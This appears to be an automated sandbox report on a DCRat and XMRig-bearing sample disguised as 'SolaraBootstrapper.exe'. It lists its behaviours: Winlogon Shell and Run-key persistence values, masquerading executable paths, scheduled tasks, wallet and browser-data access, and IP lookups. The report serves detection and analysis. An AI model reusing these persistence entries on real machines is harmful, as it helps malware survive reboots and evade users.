Malware Analysis Report

2024-11-15 05:53

Sample ID 240722-2lqvysshmp
Target SolaraBootstrapper.exe
SHA256 f9492af3afb78775082e480af744d660db9da8bc33c3ff63d869abf62d900f6e
Tags
rat dcrat xmrig execution infostealer miner persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f9492af3afb78775082e480af744d660db9da8bc33c3ff63d869abf62d900f6e

Threat Level: Known bad

The file SolaraBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

rat dcrat xmrig execution infostealer miner persistence spyware stealer

DcRat

Process spawned unexpected child process

Dcrat family

DCRat payload

xmrig

Modifies WinLogon for persistence

DCRat payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

.NET Reactor proctector

Reads user/profile data of web browsers

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Enumerates connected drives

Adds Run key to start application

Blocklisted process makes network request

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies registry class

Uses Task Scheduler COM API

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 22:40

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 22:40

Reported

2024-07-22 22:43

Platform

win10v2004-20240709-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
File created C:\Windows\Globalization\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Globalization\\smss.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\", \"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\", \"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\", \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\", \"C:\\Windows\\INF\\unsecapp.exe\", \"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\", \"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

xmrig

miner xmrig

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Youtube.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Result.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\solara.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\WaaSMedicAgent.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\Windows\\INF\\unsecapp.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Windows\\Globalization\\smss.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Internet Explorer\\en-US\\services.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun = "\"C:\\DriversavessessionDlldhcp\\OfficeClickToRun.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\Admin\\AppData\\Local\\fontdrvhost.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\fr\\wscript.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\DF15FCEA-4EE4-4717-AEF3-17B0F643CB2A\\upfc.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Recovery\\WindowsRE\\SppExtComObj.exe\"" C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" C:\DriversavessessionDlldhcp\Roblox.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC62BB1B8EFB064D2FB0E4DA2F7861CE5D.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\pd9v1t.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 6816 set thread context of 4764 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\is-windows.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\memoization.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\fs.realpath\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\read\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\.github\workflows\tests.yml C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-rebuild.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-pack.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-collect\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-ping.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\unique-slug\package.json C:\Windows\system32\msiexec.exe N/A
